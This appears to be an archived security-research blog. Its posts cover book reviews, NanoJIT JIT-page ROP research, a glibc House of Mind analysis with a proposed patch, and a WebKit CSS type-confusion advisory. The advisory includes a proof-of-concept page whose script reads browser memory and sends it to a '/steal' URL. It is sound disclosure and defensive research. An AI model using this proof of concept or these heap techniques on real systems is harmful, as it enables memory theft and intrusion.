Tuesday, June 26, 2012

Changing Blogs

After 6 years of blogging here at EM_386 I have decided to stop posting. Fortunately it is only so I can begin writing on the new LeafSR blog. I will be porting over a few of the better EM_386 posts as time permits but you can expect new content going forward.

In the past 6 years I've only logged 50 posts here but many of them still see dozens of page views a day. That is especially true of posts such as ELF Relocations Names and Symbols, WebKit CSS Type Confusion and GlibC 2.11 Stops the House of Mind. To this day I still get emails from people who read and appreciate the older posts. For that reason I will be leaving all the old content here unmodified. Hopefully someone will find it useful in the future.

Thanks again for reading and see you at the new blog!

Thursday, April 12, 2012

Practical Malware Analysis Review

I recently finished my review copy of 'Practical Malware Analysis'. I enjoyed this book for a few reasons. Each chapter concludes with some simple questions/labs to test your knowledge and give you a chance at some hands on experience related to the content you just read.

Although the title leads you to believe its strictly a malware analysis book theres a lot of good content for any new reverse engineer. This is especially true for the static analysis sections. There are also two chapters in this book that I think help it really stand out among similar books: 'Chapter 20: C++ Analysis' and 'Chapter 21: 64-bit Malware'. None of the information in these chapters is new research but as a beginner you would have to sort through dozens of research papers to find the same content. They are a great introduction to both topics.

If you analyze malware for a living or are just looking to understand how software reverse engineering works then you won't regret buying this book.

(I originally intended to post this over a month ago. Better late than never!)

Tuesday, November 22, 2011

Book reviews and more...

Recently I was sent review copies of three books from No Starch Press and Addison Wesley. This occasionally happens but I never blog reviews, I'm going to change that...


'A Bug Hunters Diary'
This book by Tobias Klein was the first book I reviewed. I, like many others in the security community, received a review copy a few weeks back and I just finished it up. I was aware of Tobias' public security advisories and tools long before this book was published, so I was eager to read it from the start. The author takes the reader through a tour of bug hunting from start to finish. This includes detailed source and binary analysis of the bugs he has found, the process for triggering them and finally gaining control of EIP. While gaining EIP is great, in 2011 its just the first step to reliable code execution, but exploitation is not the focus of the book. He does not provide full exploits due to the laws in his home country (he makes this point several times), which is a shame but understandable. Each chapter focuses on different applications ranging from media players (VLC) to kernel drivers and on different operating system platforms including iOS, Solaris, Linux and Windows. This sounds like a ton of information to take in but the book is actually quite small and readable. As usual No Starch does a good job of adding side-bar style information and good illustrations to help the reader understand complex technical concepts. There are also three appendices with helpful information for bug hunting, debugging tips and exploit mitigations. I even got a mention in appendix C for a generic RELRO technique I published a number of years ago. I definitely recommend this book for anyone who is just starting out in this field and is interested to know exactly what the process of finding software vulnerabilities is like.


'The CERT Oracle Secure Coding Standard For Java'
I would normally never review a book like this because #1 its a massive technical reference book and #2 I'm not a huge fan of Java. But I saw Robert Seacord was one of the authors and changed my mind. Nothing against the other authors, their names just weren't known to me. To be honest I did not read the entire thing, its a reference book in my opinion and not meant to be read cover to cover. In fact it reads like the cert.org standards websites and thats because its the same text. All of the CERT standards are well researched and tested, I recommend them to developers all the time and this one is no exception. If you are a Java developer then you should definitely have the standards website bookmarked. If you're looking for some light weekend reading then this probably isn't the book for you.
'The Tangled Web'
Last, but certainly not least, Michal Zalewski's newest book is about web security. @lcamtuf is a well known person in the security community. His published work includes tools that range from low level debugging to automated XSS detection. If you work in computer security and you dont know who he is then you don't really work in computer security. My expectations were high for this book for a reason and it doesn't disappoint. The first chapter contains a good overview of why security is difficult and how the web is no exception. Theres also a good browser history lesson mixed in there. I do a lot of research that involves reading browser source code and reversing particular browser components and I am always surprised by quirks I find in each different implementation. It is these subtle differences that make XSS work on one browser and not another. Theres a huge divide between a  web pentester who know how browsers work and one that just pastes JavaScript into every GET parameter. The Tangled Web captures a lot of these nuances between CSS and JavaScript implementations. Each chapter concludes with a great cheat sheet. Overall, I enjoyed the book. If you test or build web apps then you will too.

Sunday, August 07, 2011

Attacking Client Side JIT Compilers

This blog is far from dead! I have been involved in some very interesting research these past few months. Yan Ivnitskiy and I presented at the BlackHat conference in Las Vegas this August. The title of our talk was Attacking Client Side JIT Compilers. We researched everything from incorrect JIT code emission to reusing predictable JIT code sequences.

We have published our slides and our research paper on the Matasano research website. You can find it all here. Feel free to email either Yan or myself if you have any questions about the content.

Wednesday, December 15, 2010

WebKit CSS Type Confusion

Here is an interesting WebKit vulnerability I came across and reported to Google, Apple and the WebKit.org developers.

Description: WebKit CSS Parser Type Confusion
Software Affected: Chrome 7/8, Safari 5.0.3, Epiphany 2.30.2, WebKit-r72146 (others untested)
Severity: Medium

The severity of the vulnerability was marked Medium by the Chrome developers because the bug can only result in an information leak. I don't have a problem with that but I have some more thoughts on it at the end of the post. But first the technical details.

The WebKit CSS parser internally stores a CSSParserValueList which contains a vector of CSSParserValue structures. These structures are used to hold the contents of parsed CSS attribute values such as integers, floating point numbers or strings. Here is what a CSSParserValue looks like.
struct CSSParserValue {
    int id;
    bool isInt;
    union {
        double fValue;
        int iValue;
        CSSParserString string;
        CSSParserFunction* function;
    };
    enum {
        Operator = 0x100000,
        Function = 0x100001,
        Q_EMS    = 0x100002
    };
    int unit;

    PassRefPtr createCSSValue();
};
When WebKit has successfully parsed a CSS value it will set the unit variable to a constant indicating what type it should be interpreted as. So depending on the value of unit a different member of the union will be used to address the CSS value later in the code. If the value was a floating point or an integer the fValue or iValue will store that number. If the value is a string a special CSSParserString structure is used to copy the string before placing it into the DOM as element.style.src.

The vulnerability exists in a function responsible for parsing the location of a font face source. So we find ourselves in WebCore::CSSParser::parseFontFaceSrc() found in CSSParser.cpp of the WebKit source. I have clipped certain parts of the function for brevity.
bool CSSParser::parseFontFaceSrc()
{
    ...
[3629]        } else if (val->unit == CSSParserValue::Function) {
[3630]            // There are two allowed functions: local() and format().
[3631]           CSSParserValueList* args = val->function->args.get();
[3632]            if (args && args->size() == 1) {
[3633]                if (equalIgnoringCase(val->function->name, "local(") && !expectComma) {
[3634]                    expectComma = true;
[3635]                    allowFormat = false;
[3636]                    CSSParserValue* a = args->current();
[3637]                    uriValue.clear();
[3638]                    parsedValue = CSSFontFaceSrcValue::createLocal(a->string);
At this point in the code the CSS parser has already extracted the value of the font face source and now the code is trying to determine whether the font value is local or not. If the source of the font is wrapped in a local() URL then we hit the code above. The problem here is that the CSSParserValue's unit variable is never checked on line 3633. The code assumes the value previously parsed is a string and the CSSParserString structure within the union has already been initialized by a previous caller. Now on line 3636 a CSSParserValue pointer, a, is assigned to the value and on line 3638 the a->string operator is called on it. Here is what that structure looks like:
struct CSSParserString {
    UChar* characters;
    int length;

    void lower();

    operator String() const { return String(characters, length); }
    operator AtomicString() const { return AtomicString(characters, length); }
};
So when a->string is called in line 3638 WebKit's internal string functions will be called to create a string with a source pointer of a->string.characters with a length of a->string.length so it can be added to the DOM by CSSParser::addProperty(). This code assumes the value is a string but this CSSParserValue may not have been initialized as one. Lets take a second look at the union again in the CSSParserValue structure:
    union {
        double fValue;               // 64 bits
        int iValue;                  // 32 bits
        CSSParserString string;      // sizeof(CSSParserString)
        CSSParserFunction* function; // 32 bits
    };
The double fValue will occupy 64 bits in memory on a 32 bit x86 platform [1]. This means in memory at runtime the first dword of fValue overlaps with string.characters and the second with string.length. If we can supply a specific floating point value as the source location of this font face we can trigger an information leak when WebKit interprets it as a CSSParserString structure and attempts to make a copy of the string. I should also note that the string creation uses StringImpl::create which copies the string using memcpy, so we don't have to worry about our stolen data containing NULL's. Exploiting this bug is very easy:
      < html>
      < script>
        function read_memory() {
            ele = document.getElementById('1');
            document.location = "http://localhost:4567/steal?s=" + encodeURI(ele.style.src);
        }
      < /script>
      < h1 id=1 style="src: local(0.(your floating point here) );" />
      < button onClick='read_memory()'>Click Me
      < /html>
That floating point number will occupy the first 64 bits of the union. The double fValue when holding this value will look like this in memory 0xbf95d38b 0x000001d5. Which means (a->string.characters = 0xbf95d38b) and (a->string.length = 0x000001d5). Through our floating point number we can control the exact address and length of an arbitrary read whose contents will then be added to the DOM as the source of the font face. In short, an attacker can steal as much content as he wants from anywhere in your browsers virtual memory. Here is the CSSParserValue structure in memory just after the assignment of the CSSParserValue pointer, a, when running the exploit.
(gdb) print *a
$167 = {id = 0, isInt = false, {fValue = 9.9680408499984197e-312, iValue = -1080700021, 
string = {characters = 0xbf95d38b, length = 469}, function = 0xbf95d38b}, unit = 1}

(gdb) x/8x a
0xb26734f0:    0x00000000    0x00000100    0xbf95d38b    0x000001d5
0xb2673500:    0x00000001    0x00000000    0x00000000    0x00000000
Here is where the stack is mapped in my browser:
bf93a000-bf96e000 rw-p 00000000 00:00 0          [stack]
I did some testing of this bug using Gnome's Epiphany browser. It also uses WebKit and is a little easier to debug than Chrome. Here is a screenshot of the exploit using JavaScript to read 469 bytes from the stack and displaying it in an alert box:


OK so it's an info leak. No big deal... right? Info leaks are becoming more valuable as memory corruption mitigations such as ASLR (Address Space Layout Randomization) become more adopted by software vendors. An info leak essentially makes ASLR worthless because an attacker can use it to find out where your browsers heap is mapped or where a specific DLL with ROP gadgets resides in memory. Normally an info leak might come in the form of exposing a single address from an object or reading a few bytes off the end of an object, which exposes vftable addresses. These types of leaks also make exploitation easier but usually don't expose any of the web content displayed by the browser. In the case of this bug we have to specify what address to read from. If an unmapped address is used or the read walks off the end of a page then we risk crashing the process. The attacker doesn't have to worry about this on platforms without ASLR.

But almost as important as reliable code execution, the more sensitive content we push into web browsers the more valuable a highly reliable and controllable info leak could become. You could theoretically use it to read an open document or webmail or any other sensitive content the users browser has open at the time or has cached in memory from a previous site.

Anyways, hope you enjoyed the post, it was a fun vulnerability to analyze. Thanks to Google, Apple and WebKit for responding so quickly [2], even to a Medium! Now go and update your browser.

[1] http://en.wikipedia.org/wiki/Double_precision_floating-point_format
[2] http://trac.webkit.org/changeset/72685/trunk/WebCore/css/CSSParser.cpp

Wednesday, June 23, 2010

Its 2010 and your browser has an assembler

So it's 2010 and your browser has an assembler. How the hell did that happen? Simple, performance. Your browser probably includes at least one JIT (Just In Time Compiler). One for Javascript (Chrome, Firefox) and possibly others for plugins like Adobe Flash Player. If you're using Firefox with the Adobe Flash Player plugin then it has two instances of the same JIT called NanoJIT. Firefox uses SpiderMonkey/TraceMonkey as its front end to NanoJIT and Flash uses Tamarin as its front end. TraceMonkey watches for Javascript code that could benefit from being compiled into native code. It translates Javascript into LIR (Low-Level Intermediate Representation) instructions which NanoJIT turns into Native x86, x86_64, Sparc, PPC or ARM instructions. This is why your browser has an assembler in 2010.

Surely native code generation in your browser can't be bad for security? Dionysus Blazakis figured out a clever exploitation technique [1] where he used ActionScript byte code to JIT-spray a browser. The native code generated by Tamarin/NanoJIT was easy to influence via the ActionScript under his control. After reading Dion's paper last year I wanted to write my own JIT spray and research other JITs. I started with NanoJIT in Firefox. Along the way I noticed some interesting things that I thought would make a good blog post. My research isn't done but this writeup has been for awhile now and there is no sense in letting it collect dust in a directory any longer.

So first the basics. Pages for NanoJIT on Windows are allocated using the VirtualAlloc function and have RWX permissions. VirtualAlloc is not subject to ASLR (Address Space Layout Randomization) so it does not return randomized page locations. i.e. An attackers JavaScript can cause many allocations of contiguous RWX page mappings. These allocations are not at a 32-bit x86 page size granularity but their sizes are static. The next JIT-page allocation should be at 0x10000 bytes past the previous one. Dion also notes this in his paper. This is bad, but not the end of the world.

Heres some output from a WinDbg plugin I wrote (JitFind) that tracks the pages NanoJIT is using for compiled JavaScript. There are some holes in the range but as you can clearly see there are multiple contiguous allocations.

[ JitFind ] (25) 0x03510000 | js3250!VMPI_setPageProtection+0x4a | Breakpoint is off | RWX
[ JitFind ] (26) 0x03520000 | js3250!VMPI_setPageProtection+0x4a | Breakpoint is off | RWX
[ JitFind ] (27) 0x03530000 | js3250!VMPI_setPageProtection+0x4a | Breakpoint is off | RWX
[ JitFind ] (28) 0x03540000 | js3250!VMPI_setPageProtection+0x4a | Breakpoint is off | RWX
[ JitFind ] (29) 0x03550000 | js3250!VMPI_setPageProtection+0x4a | Breakpoint is off | RWX
[ JitFind ] (30) 0x03560000 | js3250!VMPI_setPageProtection+0x4a | Breakpoint is off | RWX
[ JitFind ] (31) 0x03570000 | js3250!VMPI_setPageProtection+0x4a | Breakpoint is off | RWX
[ JitFind ] (32) 0x03580000 | js3250!VMPI_setPageProtection+0x4a | Breakpoint is off | RWX
[ JitFind ] (33) 0x03590000 | js3250!VMPI_setPageProtection+0x4a | Breakpoint is off | RWX
[ JitFind ] (34) 0x035a0000 | js3250!VMPI_setPageProtection+0x4a | Breakpoint is off | RWX
(..)
[ JitFind ] (35) 0x039d0000 | js3250!VMPI_setPageProtection+0x4a | Breakpoint is off | RWX
[ JitFind ] (36) 0x039e0000 | js3250!VMPI_setPageProtection+0x4a | Breakpoint is off | RWX
[ JitFind ] (37) 0x039f0000 | js3250!VMPI_setPageProtection+0x4a | Breakpoint is off | RWX
(..)
[ JitFind ] (38) 0x03b00000 | js3250!VMPI_setPageProtection+0x4a | Breakpoint is off | RWX
[ JitFind ] (39) 0x03b10000 | js3250!VMPI_setPageProtection+0x4a | Breakpoint is off | RWX
[ JitFind ] (40) 0x03b20000 | js3250!VMPI_setPageProtection+0x4a | Breakpoint is off | RWX
[ JitFind ] (41) 0x03b30000 | js3250!VMPI_setPageProtection+0x4a | Breakpoint is off | RWX
(..)
[ JitFind ] (42) 0x03c40000 | js3250!VMPI_setPageProtection+0x4a | Breakpoint is off | RWX
(..)
[ JitFind ] (43) 0x03c60000 | js3250!VMPI_setPageProtection+0x4a | Breakpoint is off | RWX
[ JitFind ] (44) 0x03c70000 | js3250!VMPI_setPageProtection+0x4a | Breakpoint is off | RWX
[ JitFind ] (45) 0x03c80000 | js3250!VMPI_setPageProtection+0x4a | Breakpoint is off | RWX

NanoJIT internally uses a CodeList structure to track JIT pages, within each page is a pointer to the previous page, the next page and the offset where the executable code can be found. In the case of NanoJIT, JitFind works by monitoring for calls to VMPI_setPageProtection, nanojit::Assembler::endAssembly, and nanojit::CodeAlloc::reset and then walks the list for pages it might have missed. JitFind can also track pages in any process marked executable with VirtualProtect, and I'm in the process of adding support for other JIT's as well. Writing JitFind was a large part of this research effort and if I accomplished nothing else, its a pretty nice plugin.

Mozilla had already started to tackle part of the problem awhile back [2]. If you couldn't read that whole Bugzilla thread then I will sum it up for you. Mozilla's current Linux solution to solve the RWX pages problem is to make a mirror page. One is W and one is X where writes to one are translated to another. There is talk of porting the patch to Win32 and OSX as well. I don't believe this is the best solution as its goal is to make an SELinux policy happy (no WX pages) and ignores the Windows user base with a bigger problem (contiguous RWX page allocations at non-randomized locations). At best its a partial solution. The contiguous page issue does not affect Linux because NanoJIT will use the mmap function to allocate pages and mmap is subject to ASLR, which means it allocates pages at a random location.

So its quite obvious if an attacker can get his code into those RWX page regions, or a write4 anywhere condition, via an overflow or dangling pointer, he stands a pretty good chance of guessing where they are because of VirtualAlloc. But theres another twist to this issue and when combined with the contiguous RWX pages, makes for an interesting exploitation scenario.

NanoJIT writes code backwards from the end of the page. This is why code offsets from the beginning of the page appear to change. One of the important things to know is that NanoJIT also assembles a large jump table and other static code inline with JIT'd code. This static code sets up stack frames and performs other small work for the transition to/from JIT'd code. This means there are static instructions at known offsets repeated across contiguous RWX pages. I started thinking, might an attacker be able to write Javascript that forces the allocation of many RWX JIT pages, trigger his vulnerability and then transfer execution to [ JIT_PAGE + PAGE_SIZE - ROP Gadget ] to get arbitrary code execution? If your not familiar with ROP, it stands for 'Return Oriented Programming' [3] [4]. Now of course its not as easy as that in the real world. We need to find useable ROP gadgets within that static code. This is done by analyzing a large set of JIT pages, determining if any RET instructions can be found at predictable locations and then finding usable ROP gadgets preceding them. I attempted this using a combination of JitFind to dump the raw JIT RWX page contents as they were created and a simple Ruby script that analyzed each page dump for consistent RET instructions and used rbdasm to dump those potential ROP gadgets.

First we need to write some JavaScript that will force Firefox into allocating a bunch of contiguous pages that contain the same static code before we can realistically look for ROP gadgets. Resource intensive JavaScript will be required, thats why the JIT was created in the first place. Remember we are only interested in the static code produced by the JIT, not influencing the instructions like Dion did. I thought about this problem for awhile. Some simple math problems wouldn't do the trick so I turned to graphics. A Google search for JavaScript ray tracers turned up exactly what I needed. I borrowed a ray tracer written in JavaScript from the internet and after some minor tweaking NanoJIT started to sing. My tweaks mainly consisted of instructing the ray tracer to draw high quality large resolution images. With this I could now force the allocation of many (40 to 50) contiguous RWX allocations through a single instance of the ray tracer. There are a few holes in the address space here, presumably due to the system heap allocator stealing them but I haven't looked into that. This minor detail obviously hurts the reliability of the technique and I need to research it further.

Heres the output of my gogo-gadget-finder ruby script analyzing 224 pages created by five simultaneous instances of the ray tracer in a single Firefox instance. One issue here is that as pages are no longer needed they are free'd and sometimes allocated again by another ray tracer instance. I filtered these duplicates out and while it lowered the overall number of pages I was scanning it is a more accurate reflection of the process image during runtime. This behavior appears to be different then that of Tamarin and Dions experience with Flash where pages were not immediately unmapped.

* As Dion points out in the comments, he kept the JIT pages mapped using a reference to functions on them. I suspect you can do something similar in Javascript but I have not looked into it.
$ ruby gogo-gadget-finder.rb -m 5
RET @ 0xffd7 (10)
|_ raw_page_2150000-1947765593.bin
|_ raw_page_23d0000-2279729936.bin
|_ raw_page_23f0000-50251687.bin
|_ raw_page_2750000-2059690635.bin
|_ raw_page_29f0000-3894631435.bin
|_ raw_page_2d10000-2295099192.bin
|_ raw_page_2e60000-1268413647.bin
|_ raw_page_2e80000-1700891559.bin
|_ raw_page_3560000-1344858230.bin
|_ raw_page_36c0000-1565064345.bin
RET @ 0xe437 (5)
|_ raw_page_2150000-1947765593.bin
|_ raw_page_23f0000-50251687.bin
|_ raw_page_2750000-2059690635.bin
|_ raw_page_2e60000-1268413647.bin
|_ raw_page_35f0000-1316993084.bin
RET @ 0xfb09 (5)
|_ raw_page_1eb0000-1004861587.bin
|_ raw_page_2e70000-2748893595.bin
|_ raw_page_35d0000-2041835722.bin
|_ raw_page_3620000-3921514024.bin
|_ raw_page_3620000-467968694.bin
RET @ 0xffef (6)
|_ raw_page_1ea0000-181584545.bin
|_ raw_page_29a0000-141065932.bin
|_ raw_page_29b0000-3609538306.bin
|_ raw_page_2e60000-1313636049.bin
|_ raw_page_3580000-330610872.bin
|_ raw_page_35c0000-420260428.bin

Thats not a lot of repeated RET instructions, and the ones that do match are generated by the NanoJIT assembler and not in the middle of another instruction stream. Each of these repeated RET's is preceded by a large jump table and then a 'pop ebp' instruction. Whats worse is that the repeated RETs that do exist are not in pages that border one another. So while our ray tracer is generating the right number of pages, we are not getting consistent reusable gadgets across them.

So where does this leave us? ROP gadgets ending in RET instructions is going to be difficult to pull off. We didn't even find a stack pivot gadget to kick off the process. More research is needed.

Next Steps:

It may be possible to chain together sequences of 'pop %reg; jmp %reg;' to get code execution [5]. These too of course must meet the same requirements as our RET based ROP gadgets. They must be at static locations across many of the JIT pages. More fine grained control over the page creation is also desirable. The ray tracer proved useful for generating pages to search for ROP gadgets but further research of NanoJIT is needed to know whether we can influence a specific jump table or other static code construct. I only looked at NanoJITs generation of 32bit x86 code, it supports other architectures too! Of course researching similar issues on other JITs is also on the radar.

Conclusion:

This is not a specific flaw in Firefox or NanoJIT. If anything its an architectural oversight that should be further researched and hardened. The Mozilla team obviously cares about your security, which is evident by the SELinux thread from last year, but I think the problem is bigger on Windows and thats where the focus should be. This is not a trivial problem to solve on any platform. There are several factors at play including attacker influenced native code (Dions attack), static code produced by NanoJIT, page permissions and page allocation specifics. VirtualAlloc makes the contiguous allocations unavoidable short of a VirtualAlloc wrapper or another randomized page allocation API. But keeping the page permissions correct is a good place to start. Of course if you have ever written a browser exploit you already know that there are much easier ways to get code execution, DLLs loaded at fixed addresses or heap spray to name a few.

In the end this could theoretically result in an ASLR / DEP bypass for Firefox or any application that uses NanoJIT. The combination of repeated ROP gadgets in contiguous RWX page allocations makes it worth further study. And while that has not been proven here it was fun to research. Hope you enjoyed the post rant.

Note:

If your a Firefox user and the idea of a JavaScript JIT makes you nervous, I have good news for you. You can disable it: https://wiki.mozilla.org/JavaScript:TraceMonkey#Playing_with_TraceMonkey


Another JavaScript JIT Spray Presentation:

Tuesday, January 26, 2010

Glibc 2.11 stops the House of Mind

I was reading malloc.c from the Glibc 2.11 sources and I noticed a new check in the _int_free() function:
(malloc.c)
[4965]      bck = unsorted_chunks(av);
[4966] fwd = bck->fd;
[4967] if (__builtin_expect (fwd->bk != bck, 0))
[4968] {
[4969] errstr = "free(): corrupted unsorted chunks";
[4970] goto errout;
[4971] }
[4972] p->fd = fwd;
[4973] p->bk = bck;
[4974] if (!in_smallbin_range(size))
[4975] {
[4976] p->fd_nextsize = NULL;
[4977] p->bk_nextsize = NULL;
[4978] }
[4979] bck->fd = p;
[4980] fwd->bk = p;
The check starting on line 4967 appears to have been added this past June. If you're not a security person then let me bring you up to date. Corrupting heap meta data traditionally allows you to execute arbitrary code. There are plenty of papers out there you can read to catch up on the subject, but theres one important fact you should be aware of. Most of these techniques no longer work within 1 to 2 years of publication. This is because the libc maintainers add small bits of code like the one above to save you from yourself. This particular new patch is checking to see whether the arena's bin contains a location that points to a valid chunk. If that check wasn't there (as is the case in glibc 2.10.1) then the 'fwd->bk = p' line can be used to write the address of 'p' anywhere. If that didn't make sense to you then you're probably not a glibc maintainer or a neurotic security researcher, consider yourself normal.
If you're not familiar with the House of Mind then you should read 'The Malloc Maleficarum' written by Phantasmal Phantasmagoria:
"The method used involves tricking the wrapper invoked by free(),
called public_fREe(), into supplying the _int_free() internal
function with a designer controlled arena. This can subsequently
lead to an arbitrary memory overwrite. A call to free() actually
invokes a wrapper called public_fREe():"
I won't be covering these techniques in great detail here but essentially what can happen is through a single call to free() on a chunk we can overflow we can fool ptmalloc into using an arena structure we control. Certain members of the arena structure allow for arbitrary code execution to occur if the right conditions can be met. This technique currently still works in Ubuntu 9.10. The short story is: the new validation added to Glibc 2.11 stops the House of Mind technique.

... or does it?

The Malloc Maleficarum covers a second House of Mind technique which, unlike the first one, requires we place our arena at the location we want to overwrite. It still leverages a single call to free() and the trust the allocator has in the arena structure (its also been covered in other papers, see the bottom of this post) but the difference in the second technique is that the arenas 'fastbinY' container is used instead of 'bins'. This takes _int_free down a different code path, a far less constrained one. However the pointer exchange is not quite the same in this code path and so in order to gain code execution we need to place the start of our arena just before the data we want to overwrite. We can gain control of execution because we get a value of our choice written back to arena->fastbin[X] It's not an ideal situation, but it should still work in Glibc 2.11.

(malloc.c)
[4879] p->fd = *fb;
[4880] *fb = p; // This is how we get an arbitrary 4 byte overwrite

Perhaps more importantly then what does work is what will fix it. Because this technique is somewhat unreliable it may not make sense to further burden the allocator with yet another integrity check. But we should explore our options. We could try to stop all arena based attacks by inspecting where the arena itself resides, but this is a rather clumsy way of approaching the problem, and with ASLR enabled, it probably won't be too successful. A better solution might be to first check whether the chunk 'fb' points to contains a valid forward pointer to the next chunk in its list. But fastbin pointers are only singly linked, thus a subsequent check of the next chunks bwk pointer would not work. The reason they are not doubly linked is because they are never removed from these lists and consolidated with other free chunks, this of course helps performance of smaller, frequently allocated/free'd chunks. Another potential fix might be to check the current fastbin (the one that will be overwritten) entries chunk size, because the arena has to be placed near/on the region of memory we want to overwrite, the attacker most likely can not control what the size is. This partially validates that the 1) the location is valid (its mapped) and 2) has a size between 0 and MAX_FASTBIN. It might look something like this:

--- malloc.c 2009-10-30 13:17:08.000000000 -0400
+++ malloc-a.c 2010-01-20 08:28:36.000000000 -0500
@@ -4852,6 +4852,12 @@
set_fastchunks(av);
fb = &fastbin (av, fastbin_index(size));
+ if (*fb->size > get_max_fast())
+ {
+ errstr = "invalid fastbin entry (free)";
+ goto errout;
+ }
+
#ifdef ATOMIC_FASTBINS
mchunkptr fd;
mchunkptr old = *fb;

This of course is not fool proof, but its the best I've come up with in the short time I've thought about it. After a private conversation with a friend of mine who coincidentally happens to be doing some similar research, I'm not sure the integrity of the fastbin can be %100 verified in its current form.

FWIW: I emailed Glibc maintainers with my idea (as bad as it is) and did not receive a response.

Further reading on the subject:
malloc.c diff showing the new changes
MallocMaleficarum - The original paper
Aware Article - A good overview of the House of Mind with example code
A real exploit utilizing the first House of Mind 'bins' technique

Friday, July 03, 2009

Leaf - Hit Tracing

I just posted a new version of the Leaf framework. So I thought this might be a good time to blog on how to write and use a hit tracer using Leaf. Even though it is mostly a static analysis tool, the data it collects during this process is really useful to a debugger. I wanted a debug API and I wanted it fast, so a few versions ago I wrote a quick wrapper to Ptrace and put it into Leaf. It currently has only been tested for x86 Linux so there's work to be done in making it support BSD. I am always looking into other ways to make the debugging API cleaner, more useful and easier to code with, so please send any suggestions. So lets look at the steps needed to write a plugin that implements a hit tracer.

Here is what my basic hit tracer, 'lhit' (included with Leaf) implements:

1. LEAF_init() - a mandatory function that must be present in all plugins. You can use it to initialize any private data structures your plugin may need, or you can leave its function body blank.

2. LEAF_interactive() - this is the plugin hook a debugger would want to call. Ideally you only want *one* plugin calling this, it doesnt make sense to have more then one. If your plugin implements this hook it will be called after all other static analysis if finished, consider it your debugger plugins main()

3. LEAF_attach(pid_t) - takes a pid_t as its only argument and will attach the debugger to your target process.

4. LEAF_set_hittracer(pid_t, breakpoints_t, int) - this is where it gets slightly tricky. Your plugin must declare a structure somewhere of type breakpoints_t. Pass the targets pid, the breakpoints structure and flag (ON/OFF) to this function and Leaf will automatically use the vector of function addresses it collected during static analysis and set breakpoints on each of them. There is no need for your plugin to manage any of this. There is also another function called LEAF_set_breakpoint, which takes a pid_t, a breakpoints_t structure, and the address you want to break on, you can use this for any other manual breakpoints you want to set.

5. LEAF_cont(pid_t) - this one is pretty self explanitory, it takes a pid_t as its only argument, and instructs the traced program to continue. At this point Leaf will handle calling wait() for you. All you have to do is inspect and handle the signal it returns. If you had used LEAF_set_hittracer and you hit one of the breakpoints it set then you will want to call LEAF_reinstall_breakpoint and Leaf will take care of putting the old instruction back, single stepping and reinstalling the breakpoint for you.

6. LEAF_get_regs(pid_t, user_regs_struct) - this will retrieve the processes registers for you.

7. LEAF_detach(pid_t) - will detach Leaf from your process.

8. LEAF_cleanup() - another mandatory plugin hook which you can use to free memory or close file descriptors, or you can leave it blank.

You will find an example hit tracer (lhit) which implements all of this in version 0.0.15 of Leaf here. Its not the best hit tracer in the world but it does the job. The debugger internals will be getting an overhaul soon, but the API should stay the same.

This new version of Leaf also contains my experimental LeafRub plugin which embeds a Ruby interpreter for scripting capabilities. An example LeafRub.rb script is also included, but I'll blog more about that later.

Saturday, June 20, 2009

Fun with erase()

Over the last few months I've been knee deep in C++, you can view this as good thing or a bad thing, I for one enjoy it. I personally like finding bugs in C++ applications, as they are usually more complex then plain old C and require a bit more thought:
  • Keeping track of what variables your destructor will take care of, and which it wont
  • Iterators, and what methods invalidate them
  • (insert your favorite C++ gotcha here)
While debugging a crash one day it occured to me that the security research community has paid very little attention to the STL and CPPism's in general. There are a few things out there like TAOSSA's delete vs delete[] and of course there is also Cert's secure coding standards. But there is very little written on exploring STL specific bugs. Maybe its all private and im just not cool enough to see it :/

I decided to document some ways STL specific bugs may be exploited. The first place I looked was containers, you know vectors/queues/lists etc... Any use of these containers probably means lots of interesting data is being stored, and considering they all have very easy-to-use methods even novice C++ developers were (ab)using them somewhere.
Most of these methods take in iterators (don't let the name fool you, they're just pointers), and tainted iterators have been a known bad thing for a long time (read certs secure coding standards). But where were the exploits? Where were the how-to's on owning an attacker influenced iterator? I decided to look into it myself.
I settled on using vectors as my first topic of interest, as they are widely used for their efficiency and ease of use. I further focused my efforts by looking at any method that added/moved/deleted multiple elements of data at a time from a container. The erase method seemed like a good candidate considering the amount of memory copies that take place under the hood.
The erase method either takes a single position within the container and removes it, or it takes a range supplied by two iterators and deletes the elements within that range. But I needed to see what it looked like under the hood. After navigating the tangled mess that is the GNU C++ templates (this is probably the real reason no one has done a lot of STL security research) I was able to isolate the relevant erase() code and find what I was looking for.
This is where you are probably getting bored, so I'll skip ahead and just tell you why you care about any of this.
Tainted iterators are a known C++ gotcha that every code auditor should know about, but in certain situations they can lead to very interesting conditions for an exploit writer. The Cert secure coding standard begins to touch on the subject of invalid iterator ranges, but labels their 'undefined behavior' as equivalent to a buffer overflow. This is true, however it can be more then that depending onthe STL implementation. When an attacker can control the range iterators passed to erase() he may be able to leak or directly overwrite memory contents or even better he can trick the STL into resizing the container to encapsulate adjacent heap memory (think 'other containers'). This opens up all kinds of doors for creative exploitation.

I would love to post those details here, but blogger mangled my write up pretty bad. So I've uploaded it here. If you spot any inaccurate technical information please let me know.

Thursday, January 08, 2009

Leaf

It's been awhile since I have posted. This blog is up to almost 500 subscribers somehow.

I posted a new project on googlecode. Leaf is an ELF reversing framework written in C. It has a built in API for developing your own analysis and output plugins. The current version (0.0.7) supports plugins written in C. The whole point of the project is flexibility in the analysis and output of the stuff your interested in. It's not just another text based disassembler, although a plugin that implements one can be easily written. In fact I released one with it and its available for download at the website. I am slowly releasing other plugins of varying quality. There are plenty of great tools for reversing on the Win32 platform, so there is no plan to support the PE format. If you want more information on it check out the googlecode link and look at the wiki.
It's still beta quality and there are definitely a few bugs. I hope you find it useful.

Update: Posted Leaf-0.0.10.tar.gz at http://leaf-re.googlecode.com It now uses udis86. Lots of work still to do, but its a start.

Wednesday, June 25, 2008

BitStruct is great

If you code in Ruby and do any binary parsing then you need to be using BitStruct. It makes C style structs in Ruby very easy. Sometimes you have to sniff a custom binary protocol the quick and dirty way, these are times I turn to Ruby instead of C. The Bitstruct release has some good examples of parsing network protocols but using raw sockets in Ruby is ugly. I prefer to use the LibPcap wrappers instead for the awesomeness of pcap filters.
require 'pcaplet'
require 'bit-struct'

# Fake protocol I made up for this example
class CustomProtocol < BitStruct
char :header, 64, :endian => :native
unsigned :length, 8, :endian => :native
unsigned :next_hdr, 16, :endian => :little
unsigned :next_tag, 16, :endian => :network
unsigned :type, 32, :endian => :native
rest :data
end

# Capture up to 1533 bytes
sniff = Pcaplet.new('-s 1533')

# Specific pcap filter so we only grab the protocol we are dissecting
pcap_filter = Pcap::Filter.new('tcp && port 34504 && src 192.168.1.10', sniff.capture)

sniff.add_filter(pcap_filter)

for pkt in sniff
if pcap_filter =~ pkt
puts pkt
